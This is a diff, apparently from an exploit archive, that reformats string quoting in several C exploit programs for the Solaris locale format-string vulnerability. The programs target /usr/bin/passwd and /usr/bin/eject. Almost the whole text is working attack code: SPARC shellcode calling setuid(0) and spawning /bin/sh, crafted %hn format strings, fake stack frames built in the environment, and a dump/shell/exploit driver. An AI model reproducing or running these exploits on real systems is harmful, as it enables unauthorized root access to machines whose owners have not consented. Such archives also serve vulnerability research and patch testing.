||||
if (!strncmp(argv[1], \"dump\", 4)) { dump = 1; }
|
||||
else if(!strncmp(argv[1], \"shell\", 5)) { shell = 1; }
|
||||
else if(!strncmp(argv[1], \"exploit\", 7)) { exploit = 1; }
|
||||
if (!strncmp(argv[1], "dump", 4)) { dump = 1; }
|
||||
else if(!strncmp(argv[1], "shell", 5)) { shell = 1; }
|
||||
else if(!strncmp(argv[1], "exploit", 7)) { exploit = 1; }
|
||||
else {
|
||||
usage(argv[0]);
|
||||
}
|
||||
|
||||
for (i = 2; i < argc; i++) {
|
||||
if ( (sscanf(argv[i], \"--align=%d\", &align) ||
|
||||
sscanf(argv[i], \"--num=%d\", &num) ||
|
||||
sscanf(argv[i], \"--shellofs=%d\", &shellofs) ||
|
||||
sscanf(argv[i], \"--retlocofs=%d\", &retlocofs) ||
|
||||
sscanf(argv[i], \"--retloc=%x\", &retloc))== 0) {
|
||||
printf(\"Unrecognized option %s\\n\\n\", argv[i]);
|
||||
if ( (sscanf(argv[i], "--align=%d", &align) ||
|
||||
sscanf(argv[i], "--num=%d", &num) ||
|
||||
sscanf(argv[i], "--shellofs=%d", &shellofs) ||
|
||||
sscanf(argv[i], "--retlocofs=%d", &retlocofs) ||
|
||||
sscanf(argv[i], "--retloc=%x", &retloc))== 0) {
|
||||
printf("Unrecognized option %s\n\n", argv[i]);
|
||||
usage(argv[0]);
|
||||
}
|
||||
}
|
||||
|
@ -243,54 +243,54 @@ main(int argc, char **argv)
|
|||
|
||||
/* sh_add now points to the beginning of the shell buffer */
|
||||
|
||||
printf(\"Calculated shell buffer address: 0x%x\\n\", sh_addr);
|
||||
printf("Calculated shell buffer address: 0x%x\n", sh_addr);
|
||||
|
||||
if (shell == 1) {
|
||||
put_long(&shellbuf[align], sh_addr); /* put sh_addr on the stack */
|
||||
}
|
||||
|
||||
if ( ((sh_addr + align) & 0xfffffffc) != (sh_addr + align) ) {
|
||||
printf(\"Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\\n\");
|
||||
printf("Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\n");
|
||||
}
|
||||
|
||||
if (retloc == RETLOC) { /* if retloc was not specified on the command line, calculate it */
|
||||
retloc = sh_addr + align - num*4 + retlocofs;
|
||||
printf(\"Calculated retloc: 0x%x\\n\", retloc);
|
||||
printf("Calculated retloc: 0x%x\n", retloc);
|
||||
|
||||
put_long(&shellbuf[align+4], retloc);
|
||||
put_long(&shellbuf[align+12], retloc+2);
|
||||
}
|
||||
|
||||
jmp_addr = (sh_addr + align) + 64; /* Calculate the shell jump location */
|
||||
printf(\"Calculated shell code jump location: 0x%x\\n\\n\", jmp_addr);
|
||||
printf("Calculated shell code jump location: 0x%x\n\n", jmp_addr);
|
||||
|
||||
/* create the format string */
|
||||
|
||||
ptr = pattern;
|
||||
for (i = 0; i < num; i++) {
|
||||
memcpy(ptr, \"%.8x\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr = ptr + 4;
|
||||
}
|
||||
|
||||
if (dump == 1) {
|
||||
*ptr = 0; /* null-terminate */
|
||||
printf(\"Stack dump mode, dumping %d words\\n\", num);
|
||||
printf("Stack dump mode, dumping %d words\n", num);
|
||||
}
|
||||
else if (shell == 1) {
|
||||
sprintf(ptr, \" Shell buffer: %%s\");
|
||||
sprintf(ptr, " Shell buffer: %%s");
|
||||
|
||||
printf(\"shellbuf (length = %d): %s\\n\\n\", strlen(shellbuf)+1, shellbuf);
|
||||
printf(\"Shell buffer dump mode, shell buffer address is 0x%x\\n\", sh_addr);
|
||||
printf("shellbuf (length = %d): %s\n\n", strlen(shellbuf)+1, shellbuf);
|
||||
printf("Shell buffer dump mode, shell buffer address is 0x%x\n", sh_addr);
|
||||
}
|
||||
else {
|
||||
reth = (jmp_addr >> 16) & 0xffff;
|
||||
retl = (jmp_addr >> 0) & 0xffff;
|
||||
|
||||
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\", (reth - num * 8), (retl - reth));
|
||||
printf(\"Exploit mode, jumping to 0x%x\\n\", jmp_addr);
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn", (reth - num * 8), (retl - reth));
|
||||
printf("Exploit mode, jumping to 0x%x\n", jmp_addr);
|
||||
}
|
||||
|
||||
printf(\"num: %d\\t\\talign: %d\\tshellofs: %d\\tretlocofs: %d\\tretloc: 0x%x\\n\\n\",
|
||||
printf("num: %d\t\talign: %d\tshellofs: %d\tretlocofs: %d\tretloc: 0x%x\n\n",
|
||||
num, align, shellofs, retlocofs, retloc);
|
||||
|
||||
/* execute the vulnerable program using our custom environment */
|
||||
|
|
|
@ -23,11 +23,11 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
* Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g.
|
||||
* ./ex -o -4 )
|
||||
*
|
||||
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'`
|
||||
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
|
||||
* usages: ./ex -h
|
||||
*
|
||||
* Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
|
||||
* Thanks for horizon\'s great article about defeating noexec stack for Solaris.
|
||||
* Thanks for horizon's great article about defeating noexec stack for Solaris.
|
||||
*
|
||||
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
|
||||
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
|
||||
|
@ -44,20 +44,20 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
|
||||
#define BUFSIZE 2048 /* the size of format string buffer*/
|
||||
#define BUFF 128 /* the progname buffer size */
|
||||
#define SHELL \"/bin/ksh\" /* shell name */
|
||||
#define SHELL "/bin/ksh" /* shell name */
|
||||
#define DEFAULT_NUM 68 /* format strings number */
|
||||
#define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */
|
||||
#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */
|
||||
#define VULPROG "/usr/bin/passwd" /* vulnerable program name */
|
||||
|
||||
void usages(char *progname)
|
||||
{
|
||||
|
||||
int i;
|
||||
printf(\"Usage: %s \\n\", progname);
|
||||
printf(\" [-h] Help menu\\n\");
|
||||
printf(\" [-n number] format string\'s number\\n\");
|
||||
printf(\" [-a align] retloc buffer alignment\\n\");
|
||||
printf(\" [-o offset] retloc offset\\n\\n\");
|
||||
printf("Usage: %s \n", progname);
|
||||
printf(" [-h] Help menu\n");
|
||||
printf(" [-n number] format string's number\n");
|
||||
printf(" [-a align] retloc buffer alignment\n");
|
||||
printf(" [-o offset] retloc offset\n\n");
|
||||
|
||||
}
|
||||
|
||||
|
@ -65,7 +65,7 @@ void usages(char *progname)
|
|||
long get_sp(void)
|
||||
|
||||
{
|
||||
__asm__(\"mov %sp,%i0\");
|
||||
__asm__("mov %sp,%i0");
|
||||
}
|
||||
|
||||
|
||||
|
@ -97,22 +97,22 @@ main( int argc, char **argv )
|
|||
|
||||
strncpy(progname, argv[0], BUFF-1);
|
||||
|
||||
while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1)
|
||||
while ((opt = getopt(argc, argv, "n:a:o:h")) != -1)
|
||||
switch((char)opt)
|
||||
{
|
||||
|
||||
case \'n\':
|
||||
case 'n':
|
||||
num = atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'a\':
|
||||
case 'a':
|
||||
align = atoi(optarg);
|
||||
break;
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset = atoi(optarg);
|
||||
break;
|
||||
case \'?\':
|
||||
case \'h\':
|
||||
case '?':
|
||||
case 'h':
|
||||
default:
|
||||
usages(progname);
|
||||
exit(0);
|
||||
|
@ -125,8 +125,8 @@ main( int argc, char **argv )
|
|||
|
||||
/* Construct fake frame in environ */
|
||||
|
||||
env[0] = \"NLSPATH=:.\";
|
||||
env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */
|
||||
env[0] = "NLSPATH=:.";
|
||||
env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */
|
||||
/* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
|
||||
env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */
|
||||
env[3]=&(fakeframe[40]);/* |0x00 */
|
||||
|
@ -136,17 +136,17 @@ main( int argc, char **argv )
|
|||
env[7]=SHELL; /* shell strings */
|
||||
env[8]=NULL;
|
||||
|
||||
/* calculate the length of \"VULPROG\" + argv[1] */
|
||||
arg_len = strlen(VULPROG) + strlen(\"-z\") + 2;
|
||||
/* calculate the length of "VULPROG" + argv[1] */
|
||||
arg_len = strlen(VULPROG) + strlen("-z") + 2;
|
||||
|
||||
/* calculate the pad nummber .
|
||||
* We manage to let the length of padding + arg_len + \"NLSPATH=.\" can
|
||||
* We manage to let the length of padding + arg_len + "NLSPATH=." can
|
||||
* be divided by 4. So fakeframe address is aligned with 4, otherwise
|
||||
* the exploit won\'t work.
|
||||
* the exploit won't work.
|
||||
*/
|
||||
pad = 3 - (arg_len + strlen(env[0]) +1)%4;
|
||||
memset(padding, \'A\', pad);
|
||||
padding[pad] = \'\\0\';
|
||||
memset(padding, 'A', pad);
|
||||
padding[pad] = '\0';
|
||||
|
||||
/* get environ length */
|
||||
env_len = 0;
|
||||
|
@ -162,21 +162,21 @@ main( int argc, char **argv )
|
|||
* ^ ^
|
||||
* |__startaddr |__sp_addr
|
||||
*
|
||||
* \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
|
||||
* "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
|
||||
*
|
||||
* I find \"startaddr\" always can be divided by 4.
|
||||
* So we can adjust the padding\'s size to let the fakeframe address
|
||||
* I find "startaddr" always can be divided by 4.
|
||||
* So we can adjust the padding's size to let the fakeframe address
|
||||
* can be aligned with 4.
|
||||
*
|
||||
* len = length of \"argv\" + \"env\" + \"platform\" + \"program name\"
|
||||
* len = length of "argv" + "env" + "platform" + "program name"
|
||||
* if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4
|
||||
* if (len%4)==0, sp_addr - startaddr = len
|
||||
* So we can get every entry\'s address precisely based on startaddr or sp_addr.
|
||||
* Now we won\'t be bored with guessing the alignment and offset.:)
|
||||
* So we can get every entry's address precisely based on startaddr or sp_addr.
|
||||
* Now we won't be bored with guessing the alignment and offset.:)
|
||||
*/
|
||||
len = arg_len + env_len + strlen(plat) + 1
|
||||
+ strlen(VULPROG) + 1;
|
||||
printf(\"len = %#x\\n\", len);
|
||||
printf("len = %#x\n", len);
|
||||
|
||||
/* get stack bottom address */
|
||||
|
||||
|
@ -189,7 +189,7 @@ main( int argc, char **argv )
|
|||
sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */
|
||||
- strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ;
|
||||
|
||||
printf(\"SHELL address = %#x\\n\", sh_addr);
|
||||
printf("SHELL address = %#x\n", sh_addr);
|
||||
|
||||
/* get our fake frame address */
|
||||
fp_addr = sh_addr - 8*8 - 1;
|
||||
|
@ -197,27 +197,27 @@ main( int argc, char **argv )
|
|||
/* get execl() address */
|
||||
if (!(handle=dlopen(NULL,RTLD_LAZY)))
|
||||
{
|
||||
fprintf(stderr,\"Can\'t dlopen myself.\\n\");
|
||||
fprintf(stderr,"Can't dlopen myself.\n");
|
||||
exit(1);
|
||||
}
|
||||
if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL)
|
||||
if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
|
||||
{
|
||||
fprintf(stderr,\"Can\'t find execl().\\n\");
|
||||
fprintf(stderr,"Can't find execl().\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* dec 4 to skip the \'save\' instructure */
|
||||
/* dec 4 to skip the 'save' instructure */
|
||||
execl_addr -= 4;
|
||||
|
||||
/* check if the exec addr includes zero */
|
||||
if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
|
||||
!(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
|
||||
{
|
||||
fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\");
|
||||
fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf(\"Using execl() address : %#x\\n\",execl_addr);
|
||||
printf("Using execl() address : %#x\n",execl_addr);
|
||||
|
||||
/* now we set up our fake stack frame */
|
||||
|
||||
|
@ -239,15 +239,15 @@ main( int argc, char **argv )
|
|||
*addrptr++=fp1_addr;
|
||||
*addrptr++=fp1_addr;
|
||||
*addrptr++=fp1_addr; /* we need this address to work */
|
||||
*addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */
|
||||
*addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */
|
||||
|
||||
*addrptr++=0x0;
|
||||
/* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
|
||||
retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
|
||||
|
||||
printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align );
|
||||
printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align );
|
||||
|
||||
/* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
|
||||
/* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
|
||||
|
||||
addrptr = (long *)retlocbuf;
|
||||
for( i = 0 ; i < 8 ; i ++ )
|
||||
|
@ -258,19 +258,19 @@ main( int argc, char **argv )
|
|||
*(addrptr + 7) = retloc + 2;
|
||||
|
||||
if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
|
||||
printf(\"Can\'t get enough memory!\\n\");
|
||||
printf("Can't get enough memory!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
/* Let\'s make formats string buffer:
|
||||
/* Let's make formats string buffer:
|
||||
* |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|
|
||||
*/
|
||||
ptr = pattern;
|
||||
memset(ptr, \'A\', 32);
|
||||
memset(ptr, 'A', 32);
|
||||
ptr += 32;
|
||||
|
||||
for(i = 0 ; i < num ; i++ ){
|
||||
memcpy(ptr, \"%.8x\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr += 4;
|
||||
}
|
||||
|
||||
|
@ -281,30 +281,30 @@ main( int argc, char **argv )
|
|||
|
||||
|
||||
/* Big endian arch */
|
||||
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\",
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
|
||||
(reth - num*8 -4*8 + align ), (0x10000 + retl - reth),
|
||||
(0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));
|
||||
|
||||
if( !(fp = fopen(\"messages.po\", \"w+\")))
|
||||
if( !(fp = fopen("messages.po", "w+")))
|
||||
{
|
||||
perror(\"fopen\");
|
||||
perror("fopen");
|
||||
exit(1);
|
||||
}
|
||||
fprintf(fp,\"domain \\\"messages\\\"\\n\");
|
||||
fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\");
|
||||
fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align);
|
||||
fprintf(fp,"domain \"messages\"\n");
|
||||
fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n");
|
||||
fprintf(fp,"msgstr \"%s\\n\"", pattern + align);
|
||||
fclose(fp);
|
||||
system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\");
|
||||
system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");
|
||||
|
||||
/* thanks for z33d\'s idea.
|
||||
/* thanks for z33d's idea.
|
||||
* It seems we have to do like this in Solaris 8.
|
||||
*/
|
||||
i=open(\"./SUNW_OST_OSLIB\",O_RDWR);
|
||||
i=open("./SUNW_OST_OSLIB",O_RDWR);
|
||||
/* locate the start position of formats strings in binary file*/
|
||||
lseek(i, 62, SEEK_SET);
|
||||
/* replace the start bytes with our retlocbuf */
|
||||
write(i, retlocbuf + align, 32 - align);
|
||||
close(i);
|
||||
|
||||
execle(VULPROG, VULPROG, \"-z\", NULL, env);
|
||||
execle(VULPROG, VULPROG, "-z", NULL, env);
|
||||
} /* end of main */
|
|
@ -19,7 +19,7 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
*/
|
||||
|
||||
|
||||
/* \"eject\" exploit for locale subsystem format strings bug In Solaris
|
||||
/* "eject" exploit for locale subsystem format strings bug In Solaris
|
||||
* Tested in Solaris 2.6/7.0
|
||||
* Script kiddies: you should modify this code
|
||||
* slightly by yourself. :)
|
||||
|
@ -37,30 +37,30 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
|
||||
#define RETLOC 0xffbefa2c /* default retloc */
|
||||
#define NUM 95 /* maybe should adjust this number */
|
||||
#define ALIGN 0 /* If don\'t work ,try adjust align to 0,1,2,3 */
|
||||
#define ALIGN 0 /* If don't work ,try adjust align to 0,1,2,3 */
|
||||
|
||||
#define BUFSIZE 2048 /* the size of format string buffer*/
|
||||
#define EGGSIZE 1024 /* the egg buffer size */
|
||||
#define NOP 0xfa1d4015 /* \"xor %l5, %l5, %l5\" */
|
||||
#define NOP 0xfa1d4015 /* "xor %l5, %l5, %l5" */
|
||||
#define ALIGN1 2
|
||||
|
||||
#define VULPROG \"/usr/bin/eject\"
|
||||
#define VULPROG "/usr/bin/eject"
|
||||
|
||||
char shellcode[] = /* from scz\'s funny shellcode for SPARC */
|
||||
\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */
|
||||
\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */
|
||||
\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\"
|
||||
\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\"
|
||||
\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\"
|
||||
\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\"
|
||||
\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\"
|
||||
\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\";
|
||||
char shellcode[] = /* from scz's funny shellcode for SPARC */
|
||||
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */
|
||||
"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */
|
||||
"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08"
|
||||
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
|
||||
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
|
||||
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
|
||||
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
|
||||
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
|
||||
|
||||
/* get current stack point address to guess Return address */
|
||||
long get_sp(void)
|
||||
|
||||
{
|
||||
__asm__(\"mov %sp,%i0\");
|
||||
__asm__("mov %sp,%i0");
|
||||
}
|
||||
|
||||
|
||||
|
@ -76,14 +76,14 @@ main( int argc, char **argv )
|
|||
long reth, retl;
|
||||
FILE *fp;
|
||||
|
||||
if( argc > 1 ) sscanf(argv[1],\"%x\",&retloc);
|
||||
if( argc > 1 ) sscanf(argv[1],"%x",&retloc);
|
||||
if( argc > 2 ) align = atoi(argv[2]);
|
||||
if( argc > 3 ) num = atoi(argv[3]);
|
||||
|
||||
|
||||
addrptr = (long *) retlocbuf;
|
||||
retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
|
||||
/* Let\'s make reloc buffer */
|
||||
/* Let's make reloc buffer */
|
||||
|
||||
for( i = 0 ; i < 2 ; i ++ ){
|
||||
*addrptr++ = 0x41414141;
|
||||
|
@ -94,7 +94,7 @@ main( int argc, char **argv )
|
|||
|
||||
/* construct shellcode buffer */
|
||||
|
||||
memset(eggbuf,\'A\',EGGSIZE); /* fill the eggbuf with garbage */
|
||||
memset(eggbuf,'A',EGGSIZE); /* fill the eggbuf with garbage */
|
||||
for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */
|
||||
{
|
||||
eggbuf[i+3]=NOP & 0xff;
|
||||
|
@ -106,8 +106,8 @@ main( int argc, char **argv )
|
|||
If not, exploit will fail. Anyway, our shellcode is. ;-)
|
||||
*/
|
||||
memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode, strlen(shellcode));
|
||||
//memcpy(eggbuf,\"EGG=\",4);/* Now : EGG=NOP...NOPSHELLCODE */
|
||||
env[0] = \"NLSPATH=:.\";
|
||||
//memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
|
||||
env[0] = "NLSPATH=:.";
|
||||
env[1] = eggbuf; /* put eggbuf in env */
|
||||
env[2] = NULL; /* end of env */
|
||||
|
||||
|
@ -117,43 +117,43 @@ main( int argc, char **argv )
|
|||
/* get stack bottom address */
|
||||
sp_addr = (get_sp() | 0xffff) & 0xfffffffc;
|
||||
/* get shellcode address . many thanks to Olaf Kirch. :)
|
||||
* the trailing \'8\' make sure our sh_addr into \"NOP\"s area.
|
||||
* the trailing '8' make sure our sh_addr into "NOP"s area.
|
||||
*/
|
||||
sh_addr = sp_addr - strlen(VULPROG) - strlen(plat) - strlen(eggbuf) - 3 + 8 ;
|
||||
|
||||
printf(\"Usages: %s <retloc> <align> <num> <bufsize> \\n\\n\", argv[0] );
|
||||
printf(\"Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\\n\", retloc, sh_addr, align );
|
||||
printf("Usages: %s <retloc> <align> <num> <bufsize> \n\n", argv[0] );
|
||||
printf("Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\n", retloc, sh_addr, align );
|
||||
|
||||
if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
|
||||
printf(\"Can\'t get enough memory!\\n\");
|
||||
printf("Can't get enough memory!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
ptr = pattern;
|
||||
for(i = 0 ; i < num ; i++ ){
|
||||
memcpy(ptr, \"%.8x\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr += 4;
|
||||
}
|
||||
|
||||
reth = (sh_addr >> 16) & 0xffff ;
|
||||
retl = (sh_addr >> 0) & 0xffff ;
|
||||
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\",(reth - num*8),
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(reth - num*8),
|
||||
(0x10000 + retl - reth));
|
||||
|
||||
printf(\"%s\",pattern);
|
||||
printf("%s",pattern);
|
||||
|
||||
if( !(fp = fopen(\"messages.po\", \"w+\")))
|
||||
if( !(fp = fopen("messages.po", "w+")))
|
||||
{
|
||||
perror(\"fopen\");
|
||||
perror("fopen");
|
||||
exit(1);
|
||||
}
|
||||
fprintf(fp,\"domain \\\"messages\\\"\\n\");
|
||||
fprintf(fp,\"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\");
|
||||
fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern);
|
||||
fprintf(fp,"domain \"messages\"\n");
|
||||
fprintf(fp,"msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
|
||||
fprintf(fp,"msgstr \"%s\\n\"", pattern);
|
||||
fclose(fp);
|
||||
system(\"/usr/bin/msgfmt messages.po\");
|
||||
system(\"cp messages.mo SUNW_OST_OSCMD\");
|
||||
system(\"cp messages.mo SUNW_OST_OSLIB\");
|
||||
system("/usr/bin/msgfmt messages.po");
|
||||
system("cp messages.mo SUNW_OST_OSCMD");
|
||||
system("cp messages.mo SUNW_OST_OSLIB");
|
||||
|
||||
execle(VULPROG,VULPROG,\"-x\",retlocbuf + align1, NULL, env);
|
||||
execle(VULPROG,VULPROG,"-x",retlocbuf + align1, NULL, env);
|
||||
} /* end of main */
|
||||
|
|
|
@ -3,11 +3,11 @@
|
|||
* Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g.
|
||||
* ./ex -o -4 )
|
||||
*
|
||||
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'`
|
||||
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
|
||||
* usages: ./ex -h
|
||||
*
|
||||
* Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
|
||||
* Thanks for horizon\'s great article about defeating noexec stack for Solaris.
|
||||
* Thanks for horizon's great article about defeating noexec stack for Solaris.
|
||||
*
|
||||
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
|
||||
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
|
||||
|
@ -24,26 +24,26 @@
|
|||
|
||||
#define BUFSIZE 2048 /* the size of format string buffer */
|
||||
#define BUFF 128 /* the progname buffer size */
|
||||
#define SHELL \"/bin/ksh\" /* shell name */
|
||||
#define SHELL "/bin/ksh" /* shell name */
|
||||
#define DEFAULT_NUM 68 /* format strings number */
|
||||
#define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */
|
||||
#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */
|
||||
#define VULPROG "/usr/bin/passwd" /* vulnerable program name */
|
||||
|
||||
void usages(char *progname)
|
||||
{
|
||||
int i;
|
||||
printf(\"Usage: %s \\n\", progname);
|
||||
printf(\" [-h] Help menu\\n\");
|
||||
printf(\" [-n number] format string\'s number\\n\");
|
||||
printf(\" [-a align] retloc buffer alignment\\n\");
|
||||
printf(\" [-o offset] retloc offset\\n\\n\");
|
||||
printf("Usage: %s \n", progname);
|
||||
printf(" [-h] Help menu\n");
|
||||
printf(" [-n number] format string's number\n");
|
||||
printf(" [-a align] retloc buffer alignment\n");
|
||||
printf(" [-o offset] retloc offset\n\n");
|
||||
|
||||
}
|
||||
|
||||
/* get current stack point address to guess Return address */
|
||||
long get_sp(void)
|
||||
{
|
||||
__asm__(\"mov %sp,%i0\");
|
||||
__asm__("mov %sp,%i0");
|
||||
}
|
||||
|
||||
main( int argc, char **argv )
|
||||
|
@ -70,22 +70,22 @@ main( int argc, char **argv )
|
|||
char progname[BUFF];
|
||||
strncpy(progname, argv[0], BUFF-1);
|
||||
|
||||
while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1)
|
||||
while ((opt = getopt(argc, argv, "n:a:o:h")) != -1)
|
||||
switch((char)opt)
|
||||
{
|
||||
|
||||
case \'n\':
|
||||
case 'n':
|
||||
num = atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'a\':
|
||||
case 'a':
|
||||
align = atoi(optarg);
|
||||
break;
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset = atoi(optarg);
|
||||
break;
|
||||
case \'?\':
|
||||
case \'h\':
|
||||
case '?':
|
||||
case 'h':
|
||||
default:
|
||||
usages(progname);
|
||||
exit(0);
|
||||
|
@ -98,8 +98,8 @@ main( int argc, char **argv )
|
|||
|
||||
/* Construct fake frame in environ */
|
||||
|
||||
env[0] = \"NLSPATH=:.\";
|
||||
env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */
|
||||
env[0] = "NLSPATH=:.";
|
||||
env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */
|
||||
/* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
|
||||
env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */
|
||||
env[3]=&(fakeframe[40]);/* |0x00 */
|
||||
|
@ -109,17 +109,17 @@ main( int argc, char **argv )
|
|||
env[7]=SHELL; /* shell strings */
|
||||
env[8]=NULL;
|
||||
|
||||
/* calculate the length of \"VULPROG\" + argv[1] */
|
||||
arg_len = strlen(VULPROG) + strlen(\"-z\") + 2;
|
||||
/* calculate the length of "VULPROG" + argv[1] */
|
||||
arg_len = strlen(VULPROG) + strlen("-z") + 2;
|
||||
|
||||
/* calculate the pad nummber .
|
||||
* We manage to let the length of padding + arg_len + \"NLSPATH=.\" can
|
||||
* We manage to let the length of padding + arg_len + "NLSPATH=." can
|
||||
* be divided by 4. So fakeframe address is aligned with 4, otherwise
|
||||
* the exploit won\'t work.
|
||||
* the exploit won't work.
|
||||
